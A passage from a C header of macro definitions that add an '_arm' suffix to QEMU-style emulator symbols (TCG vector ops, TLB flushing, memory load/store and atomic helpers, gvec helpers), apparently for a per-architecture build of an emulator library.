tcg_gen_nand_vec_arm #define tcg_gen_nor_vec tcg_gen_nor_vec_arm #define tcg_gen_eqv_vec tcg_gen_eqv_vec_arm #define tcg_gen_not_vec tcg_gen_not_vec_arm #define tcg_gen_neg_vec tcg_gen_neg_vec_arm #define tcg_gen_abs_vec tcg_gen_abs_vec_arm #define tcg_gen_shli_vec tcg_gen_shli_vec_arm #define tcg_gen_shri_vec tcg_gen_shri_vec_arm #define tcg_gen_sari_vec tcg_gen_sari_vec_arm #define tcg_gen_cmp_vec tcg_gen_cmp_vec_arm #define tcg_gen_add_vec tcg_gen_add_vec_arm #define tcg_gen_sub_vec tcg_gen_sub_vec_arm 
#define tcg_gen_mul_vec tcg_gen_mul_vec_arm #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_arm #define tcg_gen_usadd_vec tcg_gen_usadd_vec_arm #define tcg_gen_sssub_vec tcg_gen_sssub_vec_arm #define tcg_gen_ussub_vec tcg_gen_ussub_vec_arm #define tcg_gen_smin_vec tcg_gen_smin_vec_arm #define tcg_gen_umin_vec tcg_gen_umin_vec_arm #define tcg_gen_smax_vec tcg_gen_smax_vec_arm #define tcg_gen_umax_vec tcg_gen_umax_vec_arm #define tcg_gen_shlv_vec tcg_gen_shlv_vec_arm #define tcg_gen_shrv_vec tcg_gen_shrv_vec_arm #define tcg_gen_sarv_vec tcg_gen_sarv_vec_arm #define tcg_gen_shls_vec tcg_gen_shls_vec_arm #define tcg_gen_shrs_vec tcg_gen_shrs_vec_arm #define tcg_gen_sars_vec tcg_gen_sars_vec_arm #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_arm #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_arm #define tb_htable_lookup tb_htable_lookup_arm #define tb_set_jmp_target tb_set_jmp_target_arm #define cpu_exec cpu_exec_arm #define cpu_loop_exit_noexc cpu_loop_exit_noexc_arm #define cpu_reloading_memory_map cpu_reloading_memory_map_arm #define cpu_loop_exit cpu_loop_exit_arm #define cpu_loop_exit_restore cpu_loop_exit_restore_arm #define cpu_loop_exit_atomic cpu_loop_exit_atomic_arm #define tlb_init tlb_init_arm #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_arm #define tlb_flush tlb_flush_arm #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_arm #define tlb_flush_all_cpus tlb_flush_all_cpus_arm #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_arm #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_arm #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_arm #define tlb_flush_page tlb_flush_page_arm #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_arm #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_arm #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_arm #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_arm #define tlb_protect_code tlb_protect_code_arm #define tlb_unprotect_code tlb_unprotect_code_arm #define tlb_reset_dirty tlb_reset_dirty_arm #define tlb_set_dirty tlb_set_dirty_arm #define tlb_set_page_with_attrs tlb_set_page_with_attrs_arm #define tlb_set_page tlb_set_page_arm #define get_page_addr_code_hostp get_page_addr_code_hostp_arm #define get_page_addr_code get_page_addr_code_arm #define probe_access probe_access_arm #define tlb_vaddr_to_host tlb_vaddr_to_host_arm #define helper_ret_ldub_mmu helper_ret_ldub_mmu_arm #define helper_le_lduw_mmu helper_le_lduw_mmu_arm #define helper_be_lduw_mmu helper_be_lduw_mmu_arm #define helper_le_ldul_mmu helper_le_ldul_mmu_arm #define helper_be_ldul_mmu helper_be_ldul_mmu_arm #define helper_le_ldq_mmu helper_le_ldq_mmu_arm #define helper_be_ldq_mmu helper_be_ldq_mmu_arm #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_arm #define helper_le_ldsw_mmu helper_le_ldsw_mmu_arm #define helper_be_ldsw_mmu helper_be_ldsw_mmu_arm #define helper_le_ldsl_mmu helper_le_ldsl_mmu_arm #define helper_be_ldsl_mmu helper_be_ldsl_mmu_arm #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_arm #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_arm #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_arm #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_arm #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_arm #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_arm #define cpu_ldub_data_ra cpu_ldub_data_ra_arm #define cpu_ldsb_data_ra cpu_ldsb_data_ra_arm #define cpu_lduw_data_ra cpu_lduw_data_ra_arm #define cpu_ldsw_data_ra cpu_ldsw_data_ra_arm #define 
cpu_ldl_data_ra cpu_ldl_data_ra_arm #define cpu_ldq_data_ra cpu_ldq_data_ra_arm #define cpu_ldub_data cpu_ldub_data_arm #define cpu_ldsb_data cpu_ldsb_data_arm #define cpu_lduw_data cpu_lduw_data_arm #define cpu_ldsw_data cpu_ldsw_data_arm #define cpu_ldl_data cpu_ldl_data_arm #define cpu_ldq_data cpu_ldq_data_arm #define helper_ret_stb_mmu helper_ret_stb_mmu_arm #define helper_le_stw_mmu helper_le_stw_mmu_arm #define helper_be_stw_mmu helper_be_stw_mmu_arm #define helper_le_stl_mmu helper_le_stl_mmu_arm #define helper_be_stl_mmu helper_be_stl_mmu_arm #define helper_le_stq_mmu helper_le_stq_mmu_arm #define helper_be_stq_mmu helper_be_stq_mmu_arm #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_arm #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_arm #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_arm #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_arm #define cpu_stb_data_ra cpu_stb_data_ra_arm #define cpu_stw_data_ra cpu_stw_data_ra_arm #define cpu_stl_data_ra cpu_stl_data_ra_arm #define cpu_stq_data_ra cpu_stq_data_ra_arm #define cpu_stb_data cpu_stb_data_arm #define cpu_stw_data cpu_stw_data_arm #define cpu_stl_data cpu_stl_data_arm #define cpu_stq_data cpu_stq_data_arm #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_arm #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_arm #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_arm #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_arm #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_arm #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_arm #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_arm #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_arm #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_arm #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_arm #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_arm #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_arm #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_arm #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_arm #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_arm #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_arm #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_arm #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_arm #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_arm #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_arm #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_arm #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_arm #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_arm #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_arm #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_arm #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_arm #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_arm #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_arm #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_arm #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_arm #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_arm #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_arm #define helper_atomic_smin_fetchw_le_mmu 
helper_atomic_smin_fetchw_le_mmu_arm #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_arm #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_arm #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_arm #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_arm #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_arm #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_arm #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_arm #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_arm #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_arm #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_arm #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_arm #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_arm #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_arm #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_arm #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_arm #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_arm #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_arm #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_arm #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_arm #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_arm #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_arm #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_arm #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_arm #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_arm #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_arm #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_arm #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_arm #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_arm #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_arm #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_arm #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_arm #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_arm #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_arm #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_arm #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_arm #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_arm #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_arm #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_arm #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_arm #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_arm #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_arm #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_arm #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_arm #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_arm #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_arm #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_arm #define 
helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_arm #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_arm #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_arm #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_arm #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_arm #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_arm #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_arm #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_arm #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_arm #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_arm #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_arm #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_arm #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_arm #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_arm #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_arm #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_arm #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_arm #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_arm #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_arm #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_arm #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_arm #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_arm #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_arm #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_arm #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_arm #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_arm #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_arm #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_arm #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_arm #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_arm #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_arm #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_arm #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_arm #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_arm #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_arm #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_arm #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_arm #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_arm #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_arm #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_arm #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_arm #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_arm #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_arm #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_arm #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_arm #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_arm #define helper_atomic_add_fetchq_be_mmu 
helper_atomic_add_fetchq_be_mmu_arm #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_arm #define helper_atomic_xchgb helper_atomic_xchgb_arm #define helper_atomic_fetch_addb helper_atomic_fetch_addb_arm #define helper_atomic_fetch_andb helper_atomic_fetch_andb_arm #define helper_atomic_fetch_orb helper_atomic_fetch_orb_arm #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_arm #define helper_atomic_add_fetchb helper_atomic_add_fetchb_arm #define helper_atomic_and_fetchb helper_atomic_and_fetchb_arm #define helper_atomic_or_fetchb helper_atomic_or_fetchb_arm #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_arm #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_arm #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_arm #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_arm #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_arm #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_arm #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_arm #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_arm #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_arm #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_arm #define helper_atomic_xchgw_le helper_atomic_xchgw_le_arm #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_arm #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_arm #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_arm #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_arm #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_arm #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_arm #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_arm #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_arm #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_arm #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_arm #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_arm #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_arm #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_arm #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_arm #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_arm #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_arm #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_arm #define helper_atomic_xchgw_be helper_atomic_xchgw_be_arm #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_arm #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_arm #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_arm #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_arm #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_arm #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_arm #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_arm #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_arm #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_arm #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_arm #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_arm #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_arm #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_arm #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_arm #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_arm #define 
helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_arm #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_arm #define helper_atomic_xchgl_le helper_atomic_xchgl_le_arm #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_arm #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_arm #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_arm #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_arm #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_arm #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_arm #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_arm #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_arm #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_arm #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_arm #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_arm #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_arm #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_arm #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_arm #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_arm #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_arm #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_arm #define helper_atomic_xchgl_be helper_atomic_xchgl_be_arm #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_arm #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_arm #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_arm #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_arm #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_arm #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_arm #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_arm #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_arm #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_arm #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_arm #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_arm #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_arm #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_arm #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_arm #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_arm #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_arm #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_arm #define helper_atomic_xchgq_le helper_atomic_xchgq_le_arm #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_arm #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_arm #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_arm #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_arm #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_arm #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_arm #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_arm #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_arm #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_arm #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_arm #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_arm #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_arm #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_arm #define helper_atomic_umin_fetchq_le 
helper_atomic_umin_fetchq_le_arm #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_arm #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_arm #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_arm #define helper_atomic_xchgq_be helper_atomic_xchgq_be_arm #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_arm #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_arm #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_arm #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_arm #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_arm #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_arm #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_arm #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_arm #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_arm #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_arm #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_arm #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_arm #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_arm #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_arm #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_arm #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_arm #define cpu_ldub_code cpu_ldub_code_arm #define cpu_lduw_code cpu_lduw_code_arm #define cpu_ldl_code cpu_ldl_code_arm #define cpu_ldq_code cpu_ldq_code_arm #define helper_div_i32 helper_div_i32_arm #define helper_rem_i32 helper_rem_i32_arm #define helper_divu_i32 helper_divu_i32_arm #define helper_remu_i32 helper_remu_i32_arm #define helper_shl_i64 helper_shl_i64_arm #define helper_shr_i64 helper_shr_i64_arm #define helper_sar_i64 helper_sar_i64_arm #define helper_div_i64 helper_div_i64_arm #define helper_rem_i64 helper_rem_i64_arm #define helper_divu_i64 helper_divu_i64_arm #define helper_remu_i64 helper_remu_i64_arm #define helper_muluh_i64 helper_muluh_i64_arm #define helper_mulsh_i64 helper_mulsh_i64_arm #define helper_clz_i32 helper_clz_i32_arm #define helper_ctz_i32 helper_ctz_i32_arm #define helper_clz_i64 helper_clz_i64_arm #define helper_ctz_i64 helper_ctz_i64_arm #define helper_clrsb_i32 helper_clrsb_i32_arm #define helper_clrsb_i64 helper_clrsb_i64_arm #define helper_ctpop_i32 helper_ctpop_i32_arm #define helper_ctpop_i64 helper_ctpop_i64_arm #define helper_lookup_tb_ptr helper_lookup_tb_ptr_arm #define helper_exit_atomic helper_exit_atomic_arm #define helper_gvec_add8 helper_gvec_add8_arm #define helper_gvec_add16 helper_gvec_add16_arm #define helper_gvec_add32 helper_gvec_add32_arm #define helper_gvec_add64 helper_gvec_add64_arm #define helper_gvec_adds8 helper_gvec_adds8_arm #define helper_gvec_adds16 helper_gvec_adds16_arm #define helper_gvec_adds32 helper_gvec_adds32_arm #define helper_gvec_adds64 helper_gvec_adds64_arm #define helper_gvec_sub8 helper_gvec_sub8_arm #define helper_gvec_sub16 helper_gvec_sub16_arm #define helper_gvec_sub32 helper_gvec_sub32_arm #define helper_gvec_sub64 helper_gvec_sub64_arm #define helper_gvec_subs8 helper_gvec_subs8_arm #define helper_gvec_subs16 helper_gvec_subs16_arm #define helper_gvec_subs32 helper_gvec_subs32_arm #define helper_gvec_subs64 helper_gvec_subs64_arm #define helper_gvec_mul8 helper_gvec_mul8_arm #define helper_gvec_mul16 helper_gvec_mul16_arm #define helper_gvec_mul32 helper_gvec_mul32_arm #define helper_gvec_mul64 helper_gvec_mul64_arm #define 
helper_gvec_muls8 helper_gvec_muls8_arm #define helper_gvec_muls16 helper_gvec_muls16_arm #define helper_gvec_muls32 helper_gvec_muls32_arm #define helper_gvec_muls64 helper_gvec_muls64_arm #define helper_gvec_neg8 helper_gvec_neg8_arm #define helper_gvec_neg16 helper_gvec_neg16_arm #define helper_gvec_neg32 helper_gvec_neg32_arm #define helper_gvec_neg64 helper_gvec_neg64_arm #define helper_gvec_abs8 helper_gvec_abs8_arm #define helper_gvec_abs16 helper_gvec_abs16_arm #define helper_gvec_abs32 helper_gvec_abs32_arm #define helper_gvec_abs64 helper_gvec_abs64_arm #define helper_gvec_mov helper_gvec_mov_arm #define helper_gvec_dup64 helper_gvec_dup64_arm #define helper_gvec_dup32 helper_gvec_dup32_arm #define helper_gvec_dup16 helper_gvec_dup16_arm #define helper_gvec_dup8 helper_gvec_dup8_arm #define helper_gvec_not helper_gvec_not_arm #define helper_gvec_and helper_gvec_and_arm #define helper_gvec_or helper_gvec_or_arm #define helper_gvec_xor helper_gvec_xor_arm #define helper_gvec_andc helper_gvec_andc_arm #define helper_gvec_orc helper_gvec_orc_arm #define helper_gvec_nand helper_gvec_nand_arm #define helper_gvec_nor helper_gvec_nor_arm #define helper_gvec_eqv helper_gvec_eqv_arm #define helper_gvec_ands 